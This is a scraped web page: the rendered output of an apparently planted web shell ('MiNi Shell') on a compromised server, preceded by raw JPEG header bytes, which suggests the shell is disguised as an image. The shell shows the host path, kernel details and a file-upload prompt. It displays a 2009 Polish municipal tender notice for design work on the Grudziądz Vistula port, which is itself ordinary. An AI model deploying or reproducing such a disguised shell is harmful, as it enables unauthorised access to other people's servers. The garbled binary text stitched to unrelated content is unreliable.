JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090925/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090925/332422-N-2009.html

<p class="kh_header"><b>Grudziądz: Wykonanie dokumentacji projektowej p.n. Rewitalizacja i adaptacja terenów poprzemysłowych-port i nabrzeże Wisły, do nowych funkcji turystyczno-rekreacyjnych</b><br>
<b>Numer ogłoszenia: 332422 - 2009; data zamieszczenia: 25.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Grudziądz , ul. Ratuszowa 1, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 056 4510233, faks (056) 4510233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.grudziadz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej p.n. Rewitalizacja i adaptacja terenów poprzemysłowych-port i nabrzeże Wisły, do nowych funkcji turystyczno-rekreacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej p.n. Rewitalizacja i adaptacja terenów poprzemysłowych-port i nabrzeże Wisły, do nowych funkcji turystyczno-rekreacyjnych i sprawowanie nadzoru autorskiego podczas wykonywania robót.
Szczegółowy opis przedmiotu zamówienia:

1.1.	 Zakres dokumentacji projektowo-kosztorysowej obejmuje:
Wielobranżowy projekt budowlany uwzględniający specyfikę robót budowlanych w szczególności: zagospodarowanie terenu, rozwiązania architektoniczne i konstrukcyjne, nabrzeża, kładki dla pieszych w formie mostu zwodzonego,  przepustu,  rozwiązania sieci                           i urządzeń  sanitarnych,   gazowych, elektrycznych, teletechnicznych, oraz zieleni .  
Opracowanie  obejmuje   teren  poprzemysłowy  zlokalizowany między rzeką Wisłą obręb 2 i 3, a ul. Portową i Rybacką  w Grudziądzu, obręb   48, 52, 53;  - podzielony na dwa obszary: strefę portu rzecznego oraz strefę nadrzeczną obejmującą tereny w bezpośrednim sąsiedztwie Wisły rozciągające się od obecnie zagospodarowanej części spacerowej od ujścia kanału Trynki, do basenu portowego.
Przedsięwzięcie polegające na zagospodarowaniu terenów poprzemysłowych zlokalizowane będzie na działkach nr :
Obręb 48 działka nr  44/2, 45/2, 45/3, 45/4, 47,  50/2, 50/3, 51/2, 51/3,
                                  51/4, 52/1, 53/1, 54/1, 55/1, 56, 57/1, 59
Obręb 52 działka nr  1,  48/13, 48/14, 49/2, 57/3, 58/1 ,58/2, 59, 60, 61, 62 , 63
Obręb 53 działka nr 1,6, 9/2, 9/5, 14, 15/1, 15/2, 15/4, 15/6, 15/8, 15/9, 15/10, 16/1,
                                 16/2, 19/6, 19/7, 22, 26/1,26/2, 28,29,30, 31/2, 31/4, 31/5

        Elementy składowe opracowania:
1)	Projekt budowlany i wykonawczy nabrzeża Wisły wraz z miejscem cumowania statków, i dwoma slipami do wodowania łodzi służb ratowniczych, turystycznych i wędkarskich.
2)	Projekty budowlane obiektów i elementów zagospodarowania terenu opisanych w programie funkcjonalno - użytkowym -Załącznik nr 1.

3)	Projekty wykonawcze:
               - projekt zagospodarowania terenu (w tym: ukształtowanie terenu, oświetlenie      terenu,  zieleń,  komunikacja piesza i rowerowa   i mała architektura)
 -  projekt zagospodarowania basenu portowego,
 -  projekt zewnętrznych  instalacji sanitarnych (wod.-kan., c.w.u., c.o., gazowa),
 -  projekt zewnętrznych instalacji elektrycznych -oświetlenia  i zasilania obiektów,  
 -  projekt przelewu (Wisła - basen portowy)
4)	Szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych dla wszystkich branż;
5)	Informacje dotyczące bezpieczeństwa i ochrony zdrowia;
6)	Kosztorys inwestorski;
7)	Przedmiary robót budowlanych.

1.2.	Dokumentacje projektowo-kosztorysowe należy wykonać:
1) w formie papierowej w następujących ilościach:
-   projekt budowlany,  projekt budowlano-wykonawczy przyłączy wod.-kan. - po 5 egz.
            -   informacje dotyczące bezpieczeństwa i ochrony - 2 egz.,                                                                                                                                                                                                                                                                                  
- szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych,      przedmiary robót budowlanych, kosztorys inwestorski - 2 egz.
 
       2) w wersji elektronicznej w formacie plików doc, pdf, dwg, ath .

1.3.	Zakres przedmiotu zamówienia obejmuje ponadto:
1)	Wykonanie aktualizacji mapy syt.-wys. do celów projektowych;
2)	Przygotowanie dokumentów i załatwienie w imieniu Zamawiającego formalności                w zakresie uzyskania warunków technicznych przyłączenia do sieci elektroenergetycznej, gazowej, wodociągowej, kanalizacji sanitarnej i deszczowej, wymaganych uzgodnień, opinii i decyzji administracyjnych;
3)	Uzyskanie pozwolenia wodno - prawnego, decyzji środowiskowej i uzyskanie wszelkich decyzji  niezbędnych do uzyskania pozwolenia na budowę.
4)	Uzgodnienie projektowanej zieleni  z Referatem Zieleni Miejskiej tut. Urzędu.
5)	Przygotowanie informacji w zakresie charakterystyki i rozwiązań technicznych.  
6)	Wystąpienie z wnioskiem o pozwolenie na budowę.

1.4.	Charakterystyka budynku i robót towarzyszących:
1)	Lokalizacja terenu: gmina-miasto Grudziądz -  teren  poprzemysłowy  zlokalizowany między rzeką Wisłą (obręb 2, 3)  a ul. Portową i Rybacką , obręb   48, 52, 53;  - podzielony na dwa obszary: strefę portu rzecznego oraz strefę nadrzeczną obejmującą tereny w bezpośrednim sąsiedztwie Wisły rozciągające się od obecnie zagospodarowanej części spacerowej, kończącej się ujściem kanału Trynki do wejścia do portu.
2)	Opis funkcjonalny obiektów zawarty w programie funkcjonalno - użytkowym (Załącznik nr 1) rozwiązań architektonicznych zawiera koncepcja zagospodarowania terenu wykonana przez Firmę Archada ul. Przyrodnicza 2, 05 - 126 Michałów Grabina (Załącznik nr 2).	
3)	Przeznaczenie: zakłada się na przedmiotowym terenie stworzenie miejsc wypoczynku wraz z zapleczem obsługującym i układem komunikacji: z komunikacją pieszą i rowerową, miejscami postojowymi i przystankami komunikacji miejskiej.
Dostępność do całego obszaru przystosowanego do pełnienia nowych funkcji, będzie możliwa za sprawą projektowanej kładki łączącej brzegi nad wyjściem z portu 
i umożliwiającej bezpośrednie dojście na półwysep, skracając alternatywną drogę - wokół basenu portowego.
Opracowanie, ma za zadanie przywrócenie na tym terenie funkcji bardzo potrzebnych mieszkańcom oraz zapewniających rozwój walorów turystycznych i zwiększanie atrakcyjności  miasta.
4)	Warunki szczegółowe: z uwagi na usytuowanie terenu w obrębie starego miasta w strefie ochrony konserwatorskiej projekt zagospodarowania należy uzgodnić                            z architektem (Wydział Budownictwa i Planowania Przestrzennego) oraz                           z Wojewódzkim Konserwatorem Zabytków w Toruniu.
5)	Przepisy prawne, które należy uwzględnić przy realizacji zamówienia:
-  Ustawa z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2006r. Nr 156, poz.1118                  z późn. zm.);
-  Rozporządzenie Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie   warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. Nr 75, poz. 690 z późn.zm.);
- Ustawa z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz.U. z 2007 r.      Nr 223, poz.1655);
-  Ustawa z dnia 18 lipca 2001r. Prawo wodne (t.j. Dz.U. z 2005r. Nr 239, poz.2019 z   
      późn. zm.);  
- Rozporządzenie Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie        szczegółowego zakresu i formy projektu budowlanego (Dz.U. Nr 120, poz.1133);
-  Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. Nr 202, poz.2072 z późn. zm.);
-  Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia   metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. z 2004r. Nr 130, poz. 1389);
-  Rozporządzenie Ministra Infrastruktury z dnia 23 czerwca 2003r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz.U. Nr 120, poz.1126);
	

	
Podwykonawcy:
Wykonawca, który zamierza powierzyć podwykonawcom wykonanie jakiejkolwiek części zamówienia, zobowiązany jest wskazać na druku oferty zakresy zamówienia powierzane podwykonawcom. Brak jakiejkolwiek wzmianki w tym zakresie na formularzu oferty, będzie uznawane za stwierdzenie samodzielnego wykonania zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1) O zamówienie mogą ubiegać się Wykonawcy, którzy:

a)	spełniają warunki określone w art.22 ust. 1 pkt 1-3 i nie podlegają wykluczeniu na podstawie art. 24 ust 1 pkt 1-9 ustawy Prawo zamówień publicznych;
b)	dysponują osobami posiadającymi uprawnienia budowlane bez ograniczeń do projektowania (lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia tych osób)w następujących specjalnościach: 
	- architektonicznej (1 projektant + 1 projektant sprawdzający); 
	- konstrukcyjno-budowlanej (1 projektant + 1 projektant sprawdzający);
- instalacyjnej w zakresie sieci i instalacji: gazowych, wodociągowych i 	    kanalizacyjnych (1 projektant + 1 projektant sprawdzający); 
- instalacyjnej w zakresie sieci i instalacji elektrycznych  (1 projektant + 1 projektant     sprawdzający) 
 lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów.
Wykazani projektanci winni posiadać aktualne zaświadczenia o przynależności do odpowiedniej izby samorządu zawodowego.
c) w okresie ostatnich trzech lat  przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali co najmniej:
- jedną dokumentację projektową na budowę lub przebudowę portu morskiego lub śródlądowego oraz
-  jedną dokumentacje projektową na umocnienie nabrzeża rzecznego oraz
- jedną dokumentację projektową na budowę lub przebudowę kładki dla pieszych lub mostu zwodzonego.
      Dokumentacje te mogły być realizowane przez wykonawcę w jednej, dwóch lub trzech usługach.

2) Ocena spełniania powyższych warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wymienionych w punkcie 7 SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, że powyższe warunki Wykonawca spełnił. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożą oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu, lub którzy złożą dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba, że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania.

3) Niespełnienie chociażby jednego z powyższych warunków skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać następujące oświadczenia i dokumenty:

a) oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust. 1 pkt 1-3 ustawy wg Załącznika nr 4 (w przypadku składania oferty przez wykonawców występujących wspólnie, ww. dokument winien być złożony przez ustanowionego pełnomocnika, o którym mowa w art. 23 ust. 2 ustawy Pzp );

b) oświadczenie, że Wykonawca nie podlega wykluczeniu na podstawie art. 24 ust. 1 pkt 1-9 ustawy wg Załącznika nr 5(w przypadku składania oferty przez wykonawców występujących wspólnie, ww. dokument musi być złożony przez każdego wykonawcę);

c) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, (w przypadku składania oferty przez wykonawców występujących wspólnie, ww. dokument musi być złożony przez każdego wykonawcę);

d) aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w przypadku składania oferty przez wykonawców występujących wspólnie, ww. dokument musi być złożony przez każdego wykonawcę);

e) wykaz osób, którymi dysponuje lub będzie dysponował wykonawca, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych a także zakresu wykonywanych przez nich czynności - wg Załącznika nr 6;

f) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w punkcie e), wykonawca wskazał osoby, którymi będzie dysponował;

g) dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia,
posiadają wymagane uprawnienia budowlane do projektowania i wpisane są na listę członków właściwej izby samorządu zawodowego.

h) wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z załączeniem dokumentów potwierdzających, że te usługi zostały wykonane należycie - według Załącznika nr 7.

2) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów o których mowa w punkcie 1)c) i d) składa  dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert)oraz że nie zalega z uiszczaniem podatków opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert).

3) Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 2) - zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania wystawione w terminach wskazanych w punkcie 2)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.grudziadz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, Biuro Inwestycji i Remontów, ul. Ratuszowa 1, 86-300 Grudziądz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.10.2009 godzina 09:30, miejsce: Urząd Miejski, Biuro Zamówień Publicznych, ul. Ratuszowa 1, 86-300 Grudziądz, pok. 114.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com